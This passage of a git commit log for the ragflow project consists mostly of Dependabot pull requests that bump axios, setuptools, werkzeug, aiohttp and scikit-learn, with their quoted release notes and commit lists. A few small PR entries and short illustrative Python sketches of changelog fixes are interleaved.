href="4f79aef81b"><code>4f79aef</code></a>
fix(fetch): enhance fetch API detection; (<a
href="https://redirect.github.com/axios/axios/issues/6413">#6413</a>)</li>
<li><a
href="67d1373131"><code>67d1373</code></a>
chore(release): v1.7.1 (<a
href="https://redirect.github.com/axios/axios/issues/6411">#6411</a>)</li>
<li><a
href="733f15fe5b"><code>733f15f</code></a>
fix(fetch): fixed ReferenceError issue when TextEncoder is not available
in t...</li>
<li><a
href="3041c61ada"><code>3041c61</code></a>
[Release] v1.7.0 (<a
href="https://redirect.github.com/axios/axios/issues/6408">#6408</a>)</li>
<li><a
href="18b13cbaef"><code>18b13cb</code></a>
chore(docs): add fetch adapter docs; (<a
href="https://redirect.github.com/axios/axios/issues/6407">#6407</a>)</li>
<li><a
href="e62099bc8b"><code>e62099b</code></a>
fix(fetch): fixed a possible memory leak in the AbortController for the
strea...</li>
<li><a
href="b49aa8e3d8"><code>b49aa8e</code></a>
chore(release): v1.7.0-beta.2 (<a
href="https://redirect.github.com/axios/axios/issues/6403">#6403</a>)</li>
<li><a
href="d57f03a77f"><code>d57f03a</code></a>
chore(ci): bump create-pull-request version to fix a bug; (<a
href="https://redirect.github.com/axios/axios/issues/6405">#6405</a>)</li>
<li><a
href="097b0d18e9"><code>097b0d1</code></a>
chore(ci): add tag resolution for npm releases based on package version;
(<a
href="https://redirect.github.com/axios/axios/issues/6404">#6404</a>)</li>
<li>Additional commits viewable in <a
href="https://github.com/axios/axios/compare/v0.27.2...v1.7.2">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=axios&package-manager=npm_and_yarn&previous-version=0.27.2&new-version=1.7.2)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

---

<details>
<summary>Dependabot commands and options</summary>
<br />

You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits
that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after
your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge
and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating
it. You can achieve the same result by closing it manually
- `@dependabot show <dependency name> ignore conditions` will show all
of the ignore conditions of the specified dependency
- `@dependabot ignore this major version` will close this PR and stop
Dependabot creating any more for this major version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop
Dependabot creating any more for this minor version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop
Dependabot creating any more for this dependency (unless you reopen the
PR or upgrade to it yourself)
You can disable automated security fix PRs for this repo from the
[Security Alerts
page](https://github.com/infiniflow/ragflow/network/alerts).

</details>

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 16:43:31 +08:00
fdfa5d0ad4 fix graph bug about second retrieval (#1688)
### What problem does this PR solve?

#1651

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-24 14:10:45 +08:00
d96348eb22 add support for LM Studio (#1663)
### What problem does this PR solve?

#1602 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-24 12:46:43 +08:00
100b3165d8 pypdf2 to pypdf (#1684)
### What problem does this PR solve?

Addresses #59: possible infinite loop in pypdf and PyPDF2 when a comment
isn't followed by a character.

### Type of change

- [x] Refactoring
2024-07-24 12:38:48 +08:00
7e60800c95 feat: add arxiv operator #918 (#1683)
### What problem does this PR solve?

feat: add arxiv operator #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-24 11:36:23 +08:00
cHz
4b195cc14c fix: Misspelled Variable Name (#1662)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-24 11:14:46 +08:00
7034dc8dea build(deps): bump setuptools from 69.5.1 to 70.0.0 (#1666)
Bumps [setuptools](https://github.com/pypa/setuptools) from 69.5.1 to
70.0.0.
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a
href="https://github.com/pypa/setuptools/blob/main/NEWS.rst">setuptools's
changelog</a>.</em></p>
<blockquote>
<h1>v70.0.0</h1>
<h2>Features</h2>
<ul>
<li>Emit a warning when <code>[tools.setuptools]</code> is present in
<code>pyproject.toml</code> and will be ignored. -- by
:user:<code>SnoopJ</code> (<a
href="https://redirect.github.com/pypa/setuptools/issues/4150">#4150</a>)</li>
<li>Improved <code>AttributeError</code> error message if
<code>pkg_resources.EntryPoint.require</code> is called without extras
or distribution
Gracefully &quot;do nothing&quot; when trying to activate a
<code>pkg_resources.Distribution</code> with a <code>None</code>
location, rather than raising a <code>TypeError</code>
-- by :user:<code>Avasam</code> (<a
href="https://redirect.github.com/pypa/setuptools/issues/4262">#4262</a>)</li>
<li>Typed the dynamically defined variables from
<code>pkg_resources</code> -- by :user:<code>Avasam</code> (<a
href="https://redirect.github.com/pypa/setuptools/issues/4267">#4267</a>)</li>
<li>Modernized and refactored VCS handling in package_index. (<a
href="https://redirect.github.com/pypa/setuptools/issues/4332">#4332</a>)</li>
</ul>
<h2>Bugfixes</h2>
<ul>
<li>In install command, use super to call the superclass methods. Avoids
race conditions when monkeypatching from _distutils_system_mod occurs
late. (<a
href="https://redirect.github.com/pypa/setuptools/issues/4136">#4136</a>)</li>
<li>Fix finder template for lenient editable installs of implicit nested
namespaces
constructed by using <code>package_dir</code> to reorganise directory
structure. (<a
href="https://redirect.github.com/pypa/setuptools/issues/4278">#4278</a>)</li>
<li>Fix an error with <code>UnicodeDecodeError</code> handling in
<code>pkg_resources</code> when trying to read files in UTF-8 with a
fallback -- by :user:<code>Avasam</code> (<a
href="https://redirect.github.com/pypa/setuptools/issues/4348">#4348</a>)</li>
</ul>
<h2>Improved Documentation</h2>
<ul>
<li>Uses RST substitution to put badges in 1 line. (<a
href="https://redirect.github.com/pypa/setuptools/issues/4312">#4312</a>)</li>
</ul>
<h2>Deprecations and Removals</h2>
<ul>
<li>
<p>Further adoption of UTF-8 in <code>setuptools</code>.
This change regards mostly files produced and consumed during the build
process
(e.g. metadata files, script wrappers, automatically updated config
files, etc..)
Although precautions were taken to minimize disruptions, some edge cases
might
be subject to backwards incompatibility.</p>
<p>Support for <code>&quot;locale&quot;</code> encoding is now
<strong>deprecated</strong>. (<a
href="https://redirect.github.com/pypa/setuptools/issues/4309">#4309</a>)</p>
</li>
<li>
<p>Remove <code>setuptools.convert_path</code> after long deprecation
period.
This function was never defined by <code>setuptools</code> itself, but
rather a
side-effect of an import for internal usage. (<a
href="https://redirect.github.com/pypa/setuptools/issues/4322">#4322</a>)</p>
</li>
<li>
<p>Remove fallback for customisations of <code>distutils</code>'
<code>build.sub_command</code> after long
deprecated period.
Users are advised to import <code>build</code> directly from
<code>setuptools.command.build</code>. (<a
href="https://redirect.github.com/pypa/setuptools/issues/4322">#4322</a>)</p>
</li>
<li>
<p>Removed <code>typing_extensions</code> from vendored dependencies --
by :user:<code>Avasam</code> (<a
href="https://redirect.github.com/pypa/setuptools/issues/4324">#4324</a>)</p>
</li>
<li>
<p>Remove deprecated <code>setuptools.dep_util</code>.
The provided alternative is <code>setuptools.modified</code>. (<a
href="https://redirect.github.com/pypa/setuptools/issues/4360">#4360</a>)</p>
</li>
</ul>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a
href="5cbf12a9b6"><code>5cbf12a</code></a>
Workaround for release error in v70</li>
<li><a
href="9c1bcc3417"><code>9c1bcc3</code></a>
Bump version: 69.5.1 → 70.0.0</li>
<li><a
href="4dc0c31644"><code>4dc0c31</code></a>
Remove deprecated <code>setuptools.dep_util</code> (<a
href="https://redirect.github.com/pypa/setuptools/issues/4360">#4360</a>)</li>
<li><a
href="6c1ef5748d"><code>6c1ef57</code></a>
Remove xfail now that test passes. Ref <a
href="https://redirect.github.com/pypa/setuptools/issues/4371">#4371</a>.</li>
<li><a
href="d14fa0162c"><code>d14fa01</code></a>
Add all site-packages dirs when creating simulated environment for
test_edita...</li>
<li><a
href="6b7f7a18af"><code>6b7f7a1</code></a>
Prevent <code>bin</code> folders to be taken as extern packages when
vendoring (<a
href="https://redirect.github.com/pypa/setuptools/issues/4370">#4370</a>)</li>
<li><a
href="69141f69f8"><code>69141f6</code></a>
Add doctest for vendorised bin folder</li>
<li><a
href="2a53cc1200"><code>2a53cc1</code></a>
Prevent 'bin' folders to be taken as extern packages</li>
<li><a
href="720862807d"><code>7208628</code></a>
Replace call to deprecated <code>validate_pyproject</code> command (<a
href="https://redirect.github.com/pypa/setuptools/issues/4363">#4363</a>)</li>
<li><a
href="96d681aa40"><code>96d681a</code></a>
Remove call to deprecated validate_pyproject command</li>
<li>Additional commits viewable in <a
href="https://github.com/pypa/setuptools/compare/v69.5.1...v70.0.0">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=setuptools&package-manager=pip&previous-version=69.5.1&new-version=70.0.0)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)


Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 11:12:18 +08:00
71f2ba1452 build(deps): bump werkzeug from 3.0.1 to 3.0.3 (#1669)
Bumps [werkzeug](https://github.com/pallets/werkzeug) from 3.0.1 to
3.0.3.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a
href="https://github.com/pallets/werkzeug/releases">werkzeug's
releases</a>.</em></p>
<blockquote>
<h2>3.0.3</h2>
<p>This is the Werkzeug 3.0.3 security release, which fixes security
issues and bugs but does not otherwise change behavior and should not
result in breaking changes.</p>
<p>PyPI: <a
href="https://pypi.org/project/Werkzeug/3.0.3/">https://pypi.org/project/Werkzeug/3.0.3/</a>
Changes: <a
href="https://werkzeug.palletsprojects.com/en/3.0.x/changes/#version-3-0-3">https://werkzeug.palletsprojects.com/en/3.0.x/changes/#version-3-0-3</a>
Milestone: <a
href="https://github.com/pallets/werkzeug/milestone/35?closed=1">https://github.com/pallets/werkzeug/milestone/35?closed=1</a></p>
<ul>
<li>Only allow <code>localhost</code>, <code>.localhost</code>,
<code>127.0.0.1</code>, or the specified hostname when running the dev
server, to make debugger requests. Additional hosts can be added by
using the debugger middleware directly. The debugger UI makes requests
using the full URL rather than only the path. GHSA-2g68-c3qc-8985</li>
<li>Make reloader more robust when <code>&quot;&quot;</code> is in
<code>sys.path</code>. <a
href="https://redirect.github.com/pallets/werkzeug/issues/2823">#2823</a></li>
<li>Better TLS cert format with <code>adhoc</code> dev certs. <a
href="https://redirect.github.com/pallets/werkzeug/issues/2891">#2891</a></li>
<li>Inform Python &lt; 3.12 how to handle <code>itms-services</code>
URIs correctly, rather than using an overly-broad workaround in Werkzeug
that caused some redirect URIs to be passed on without encoding. <a
href="https://redirect.github.com/pallets/werkzeug/issues/2828">#2828</a></li>
<li>Type annotation for <code>Rule.endpoint</code> and other uses of
<code>endpoint</code> is <code>Any</code>. <a
href="https://redirect.github.com/pallets/werkzeug/issues/2836">#2836</a></li>
</ul>
<h2>3.0.2</h2>
<p>This is a fix release for the 3.0.x feature branch.</p>
<ul>
<li>Changes: <a
href="https://werkzeug.palletsprojects.com/en/3.0.x/changes/#version-3-0-2">https://werkzeug.palletsprojects.com/en/3.0.x/changes/#version-3-0-2</a></li>
</ul>
</blockquote>
</details>
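
The debugger host restriction described in the 3.0.3 notes above can be pictured with a minimal sketch. This is not Werkzeug's implementation: the function name `is_trusted_debugger_host` and its parameters are hypothetical, and the port handling is simplified (IPv6 literals are not covered).

```python
from typing import Optional


def is_trusted_debugger_host(host: str, server_hostname: Optional[str] = None) -> bool:
    """Illustrative check only; the name and signature are assumptions."""
    # Drop an optional port: "localhost:5000" -> "localhost".
    # IPv6 literals such as "[::1]:5000" are not handled in this sketch.
    hostname = host.partition(":")[0].lower()

    # Hosts the release notes list as allowed by default.
    allowed = {"localhost", "127.0.0.1"}
    if server_hostname:
        # "the specified hostname" the dev server was started with.
        allowed.add(server_hostname.lower())

    # ".localhost" is read here as "any subdomain of localhost".
    return hostname in allowed or hostname.endswith(".localhost")
```

Under these assumptions, `is_trusted_debugger_host("app.localhost")` is accepted while `is_trusted_debugger_host("evil.example.com")` is rejected unless that name is passed as `server_hostname`.
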
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a
href="https://github.com/pallets/werkzeug/blob/main/CHANGES.rst">werkzeug's
changelog</a>.</em></p>
<blockquote>
<h2>Version 3.0.3</h2>
<p>Released 2024-05-05</p>
<ul>
<li>
<p>Only allow <code>localhost</code>, <code>.localhost</code>,
<code>127.0.0.1</code>, or the specified
hostname when running the dev server, to make debugger requests.
Additional
hosts can be added by using the debugger middleware directly. The
debugger
UI makes requests using the full URL rather than only the path.
:ghsa:<code>2g68-c3qc-8985</code></p>
</li>
<li>
<p>Make reloader more robust when <code>&quot;&quot;</code> is in
<code>sys.path</code>. :pr:<code>2823</code></p>
</li>
<li>
<p>Better TLS cert format with <code>adhoc</code> dev certs.
:pr:<code>2891</code></p>
</li>
<li>
<p>Inform Python &lt; 3.12 how to handle <code>itms-services</code> URIs
correctly, rather
than using an overly-broad workaround in Werkzeug that caused some
redirect
URIs to be passed on without encoding. :issue:<code>2828</code></p>
</li>
<li>
<p>Type annotation for <code>Rule.endpoint</code> and other uses of
<code>endpoint</code> is
<code>Any</code>. :issue:<code>2836</code></p>
</li>
</ul>
<h2>Version 3.0.2</h2>
<p>Released 2024-04-01</p>
<ul>
<li>Ensure setting <code>merge_slashes</code> to <code>False</code>
results in <code>NotFound</code> for
repeated-slash requests against single slash routes.
:issue:<code>2834</code></li>
<li>Fix handling of <code>TypeError</code> in
<code>TypeConversionDict.get()</code> to match
<code>ValueError</code>. :issue:<code>2843</code></li>
<li>Fix <code>response_wrapper</code> type check in test client.
:issue:<code>2831</code></li>
<li>Make the return type of <code>MultiPartParser.parse</code> more
precise.
:issue:<code>2840</code></li>
<li>Raise an error if converter arguments cannot be parsed.
:issue:<code>2822</code></li>
</ul>
</blockquote>
</details>
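
The 3.0.2 entry about `TypeConversionDict.get()` treating `TypeError` like `ValueError` can be sketched as follows. This is a simplified stand-in, not Werkzeug's class: `ConvertingDict` is a hypothetical name, and only the fallback-to-default behavior the changelog describes is modeled.

```python
class ConvertingDict(dict):
    """Hypothetical stand-in for a dict whose get() can convert values."""

    def get(self, key, default=None, type=None):
        try:
            value = self[key]
        except KeyError:
            return default
        if type is None:
            return value
        try:
            return type(value)
        except (ValueError, TypeError):
            # int("x") raises ValueError, int(None) raises TypeError;
            # both fall back to the default in this sketch.
            return default
```

With this sketch, a stored `None` converted with `type=int` returns the default instead of propagating a `TypeError`.
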
<details>
<summary>Commits</summary>
<ul>
<li><a
href="f9995e9679"><code>f9995e9</code></a>
release version 3.0.3</li>
<li><a
href="3386395b24"><code>3386395</code></a>
Merge pull request from GHSA-2g68-c3qc-8985</li>
<li><a
href="890b6b6263"><code>890b6b6</code></a>
only require trusted host for evalex</li>
<li><a
href="71b69dfb7d"><code>71b69df</code></a>
restrict debugger trusted hosts</li>
<li><a
href="d2d3869525"><code>d2d3869</code></a>
endpoint type is Any (<a
href="https://redirect.github.com/pallets/werkzeug/issues/2895">#2895</a>)</li>
<li><a
href="7080b55acd"><code>7080b55</code></a>
endpoint type is Any</li>
<li><a
href="7555eff296"><code>7555eff</code></a>
remove iri_to_uri redirect workaround (<a
href="https://redirect.github.com/pallets/werkzeug/issues/2894">#2894</a>)</li>
<li><a
href="97fb2f7222"><code>97fb2f7</code></a>
remove _invalid_iri_to_uri workaround</li>
<li><a
href="249527ff98"><code>249527f</code></a>
make cn field a valid single hostname, and use wildcard in SANs field.
(<a
href="https://redirect.github.com/pallets/werkzeug/issues/2892">#2892</a>)</li>
<li><a
href="793be472c9"><code>793be47</code></a>
update adhoc tls dev cert format</li>
<li>Additional commits viewable in <a
href="https://github.com/pallets/werkzeug/compare/3.0.1...3.0.3">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=werkzeug&package-manager=pip&previous-version=3.0.1&new-version=3.0.3)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)


Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 11:11:16 +08:00
1ec84a589e build(deps): bump aiohttp from 3.9.3 to 3.9.4 (#1670)
Bumps [aiohttp](https://github.com/aio-libs/aiohttp) from 3.9.3 to
3.9.4.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a
href="https://github.com/aio-libs/aiohttp/releases">aiohttp's
releases</a>.</em></p>
<blockquote>
<h2>3.9.4</h2>
<h2>Bug fixes</h2>
<ul>
<li>
<p>The asynchronous internals now set the underlying causes
when assigning exceptions to the future objects
-- by :user:<code>webknjaz</code>.</p>
<p><em>Related issues and pull requests on GitHub:</em>
<a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8089">#8089</a>.</p>
</li>
<li>
<p>Treated values of <code>Accept-Encoding</code> header as
case-insensitive when checking
for gzip files -- by :user:<code>steverep</code>.</p>
<p><em>Related issues and pull requests on GitHub:</em>
<a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8104">#8104</a>.</p>
</li>
<li>
<p>Improved the DNS resolution performance on cache hit -- by
:user:<code>bdraco</code>.</p>
<p>This is achieved by avoiding an :mod:<code>asyncio</code> task
creation in this case.</p>
<p><em>Related issues and pull requests on GitHub:</em>
<a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8163">#8163</a>.</p>
</li>
<li>
<p>Changed the type annotations to allow <code>dict</code> on
:meth:<code>aiohttp.MultipartWriter.append</code>,
:meth:<code>aiohttp.MultipartWriter.append_json</code> and
:meth:<code>aiohttp.MultipartWriter.append_form</code> -- by
:user:<code>cakemanny</code></p>
<p><em>Related issues and pull requests on GitHub:</em>
<a
href="https://redirect.github.com/aio-libs/aiohttp/issues/7741">#7741</a>.</p>
</li>
<li>
<p>Ensure websocket transport is closed when client does not close it
-- by :user:<code>bdraco</code>.</p>
<p>The transport could remain open if the client did not close it. This
change ensures the transport is closed when the client does not close
it.</p>
</li>
</ul>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
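
The `Accept-Encoding` fix listed above amounts to comparing content codings without regard to case. A minimal sketch, assuming a hypothetical helper `client_accepts_gzip` (not an aiohttp function) and ignoring quality values such as `q=0`:

```python
def client_accepts_gzip(accept_encoding: str) -> bool:
    """Illustrative only: report whether a header value lists gzip."""
    for item in accept_encoding.split(","):
        # Drop parameters such as ";q=0.8" and normalize case, so that
        # "GZIP" and "gzip" are treated the same way.
        token = item.split(";", 1)[0].strip().lower()
        if token == "gzip":
            return True
    return False
```

A header value of `GZIP, deflate` matches in this sketch, which a case-sensitive comparison would miss.
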
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a
href="https://github.com/aio-libs/aiohttp/blob/master/CHANGES.rst">aiohttp's
changelog</a>.</em></p>
<blockquote>
<h1>3.9.4 (2024-04-11)</h1>
<h2>Bug fixes</h2>
<ul>
<li>
<p>The asynchronous internals now set the underlying causes
when assigning exceptions to the future objects
-- by :user:<code>webknjaz</code>.</p>
<p><em>Related issues and pull requests on GitHub:</em>
:issue:<code>8089</code>.</p>
</li>
<li>
<p>Treated values of <code>Accept-Encoding</code> header as
case-insensitive when checking
for gzip files -- by :user:<code>steverep</code>.</p>
<p><em>Related issues and pull requests on GitHub:</em>
:issue:<code>8104</code>.</p>
</li>
<li>
<p>Improved the DNS resolution performance on cache hit -- by
:user:<code>bdraco</code>.</p>
<p>This is achieved by avoiding an :mod:<code>asyncio</code> task
creation in this case.</p>
<p><em>Related issues and pull requests on GitHub:</em>
:issue:<code>8163</code>.</p>
</li>
<li>
<p>Changed the type annotations to allow <code>dict</code> on
:meth:<code>aiohttp.MultipartWriter.append</code>,
:meth:<code>aiohttp.MultipartWriter.append_json</code> and
:meth:<code>aiohttp.MultipartWriter.append_form</code> -- by
:user:<code>cakemanny</code></p>
<p><em>Related issues and pull requests on GitHub:</em>
:issue:<code>7741</code>.</p>
</li>
<li>
<p>Ensure websocket transport is closed when client does not close it
-- by :user:<code>bdraco</code>.</p>
<p>The transport could remain open if the client did not close it. This
change ensures the transport is closed when the client does not close
it.</p>
</li>
</ul>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
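
The first bug fix above, setting the underlying cause when assigning an exception to a future, can be illustrated with plain `asyncio`. This is a sketch of the general idea, not aiohttp's internal code; `set_exception_with_cause` and `demo` are hypothetical names.

```python
import asyncio


def set_exception_with_cause(fut, exc, cause):
    """Attach `cause` to `exc`, then store `exc` on the future (illustrative)."""
    exc.__cause__ = cause  # same effect as "raise exc from cause"
    fut.set_exception(exc)


async def demo():
    fut = asyncio.get_running_loop().create_future()
    low_level = OSError("connection reset")
    set_exception_with_cause(fut, RuntimeError("request failed"), low_level)
    try:
        await fut
    except RuntimeError as err:
        # The original low-level error is still reachable from the caller.
        return err.__cause__
```

Running `asyncio.run(demo())` returns the original `OSError`, so a traceback printed by the caller would show both the high-level error and what triggered it.
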
<details>
<summary>Commits</summary>
<ul>
<li><a
href="b3397c7ac4"><code>b3397c7</code></a>
Release v3.9.4 (<a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8201">#8201</a>)</li>
<li><a
href="a7e240a9f6"><code>a7e240a</code></a>
[PR <a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8320">#8320</a>/9ba9a4e5
backport][3.9] Fix Python parser to mark responses without...</li>
<li><a
href="28335525d1"><code>2833552</code></a>
Escape filenames and paths in HTML when generating index pages (<a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8317">#8317</a>)
(<a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8319">#8319</a>)</li>
<li><a
href="ed43040613"><code>ed43040</code></a>
[PR <a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8309">#8309</a>/c29945a1
backport][3.9] Improve reliability of run_app test (<a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8315">#8315</a>)</li>
<li><a
href="ec2be0500e"><code>ec2be05</code></a>
[PR <a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8299">#8299</a>/28d026eb
backport][3.9] Create marker for internal tests (<a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8307">#8307</a>)</li>
<li><a
href="292d961f4e"><code>292d961</code></a>
[PR <a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8304">#8304</a>/88c80c14
backport][3.9] Check for backports in CI (<a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8305">#8305</a>)</li>
<li><a
href="cebe526b9c"><code>cebe526</code></a>
Fix handling of multipart/form-data (<a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8280">#8280</a>)
(<a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8302">#8302</a>)</li>
<li><a
href="270ae9cf6a"><code>270ae9c</code></a>
[PR <a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8297">#8297</a>/d15f07cf
backport][3.9] Upgrade to llhttp 9.2.1 (<a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8292">#8292</a>)
(<a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8298">#8298</a>)</li>
<li><a
href="bb231059b1"><code>bb23105</code></a>
[PR <a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8283">#8283</a>/54e13b0a
backport][3.9] Fix blocking I/O in the event loop while pr...</li>
<li><a
href="3f79241bcb"><code>3f79241</code></a>
[PR <a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8286">#8286</a>/28f1fd88
backport][3.9] docs: remove repetitive word in comment (<a
href="https://redirect.github.com/aio-libs/aiohttp/issues/8">#8</a>...</li>
<li>Additional commits viewable in <a
href="https://github.com/aio-libs/aiohttp/compare/v3.9.3...v3.9.4">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=aiohttp&package-manager=pip&previous-version=3.9.3&new-version=3.9.4)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)


Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 11:09:31 +08:00
eb40377700 build(deps): bump scikit-learn from 1.4.1.post1 to 1.5.0 (#1671)
Bumps [scikit-learn](https://github.com/scikit-learn/scikit-learn) from
1.4.1.post1 to 1.5.0.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a
href="https://github.com/scikit-learn/scikit-learn/releases">scikit-learn's
releases</a>.</em></p>
<blockquote>
<h2>Scikit-learn 1.5.0</h2>
<p>We're happy to announce the 1.5.0 release.</p>
<p>You can read the release highlights under <a
href="https://scikit-learn.org/stable/auto_examples/release_highlights/plot_release_highlights_1_5_0.html">https://scikit-learn.org/stable/auto_examples/release_highlights/plot_release_highlights_1_5_0.html</a>
and the long version of the change log under <a
href="https://scikit-learn.org/stable/whats_new/v1.5.html">https://scikit-learn.org/stable/whats_new/v1.5.html</a></p>
<p>This version supports Python versions 3.9 to 3.12.</p>
<p>You can upgrade with pip as usual:</p>
<pre><code>pip install -U scikit-learn
</code></pre>
<p>The conda-forge builds can be installed using:</p>
<pre><code>conda install -c conda-forge scikit-learn
</code></pre>
<h2>Scikit-learn 1.4.2</h2>
<p>We're happy to announce the 1.4.2 release.</p>
<p>This release only includes support for numpy 2.</p>
<p>This version supports Python versions 3.9 to 3.12.</p>
<p>You can upgrade with pip as usual:</p>
<pre><code>pip install -U scikit-learn
</code></pre>
</blockquote>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a
href="b51d0c9648"><code>b51d0c9</code></a>
trigger whell builder [cd build]</li>
<li><a
href="919ae9bf72"><code>919ae9b</code></a>
MAINT Reoder what's new for 1.5 (<a
href="https://redirect.github.com/scikit-learn/scikit-learn/issues/29039">#29039</a>)</li>
<li><a
href="0ac28ade87"><code>0ac28ad</code></a>
DOC Release highlights 1.5 (<a
href="https://redirect.github.com/scikit-learn/scikit-learn/issues/29007">#29007</a>)</li>
<li><a
href="729b54d5af"><code>729b54d</code></a>
test py3.12 against numpy 2 [cd build]</li>
<li><a
href="1e50434f18"><code>1e50434</code></a>
set version</li>
<li><a
href="ffbe4ab45b"><code>ffbe4ab</code></a>
DOC remove obsolete SVM example (<a
href="https://redirect.github.com/scikit-learn/scikit-learn/issues/27108">#27108</a>)</li>
<li><a
href="4647729e5e"><code>4647729</code></a>
DOC Fix time complexity of MLP (<a
href="https://redirect.github.com/scikit-learn/scikit-learn/issues/28592">#28592</a>)</li>
<li><a
href="9bd7047b4a"><code>9bd7047</code></a>
FIX convergence criterion of MeanShift (<a
href="https://redirect.github.com/scikit-learn/scikit-learn/issues/28951">#28951</a>)</li>
<li><a
href="b79420f1c2"><code>b79420f</code></a>
FIX add long long for int32/int64 windows compat in NumPy 2.0 (<a
href="https://redirect.github.com/scikit-learn/scikit-learn/issues/29029">#29029</a>)</li>
<li><a
href="37f544db78"><code>37f544d</code></a>
DOC replace pandas with Polars in
examples/gaussian_process/plot_gpr_co2.py (...</li>
<li>Additional commits viewable in <a
href="https://github.com/scikit-learn/scikit-learn/compare/1.4.1.post1...1.5.0">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=scikit-learn&package-manager=pip&previous-version=1.4.1.post1&new-version=1.5.0)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

---

<details>
<summary>Dependabot commands and options</summary>
<br />

You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits
that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after
your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge
and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating
it. You can achieve the same result by closing it manually
- `@dependabot show <dependency name> ignore conditions` will show all
of the ignore conditions of the specified dependency
- `@dependabot ignore this major version` will close this PR and stop
Dependabot creating any more for this major version (unless you reopen
the PR or upgrade to it yourself)
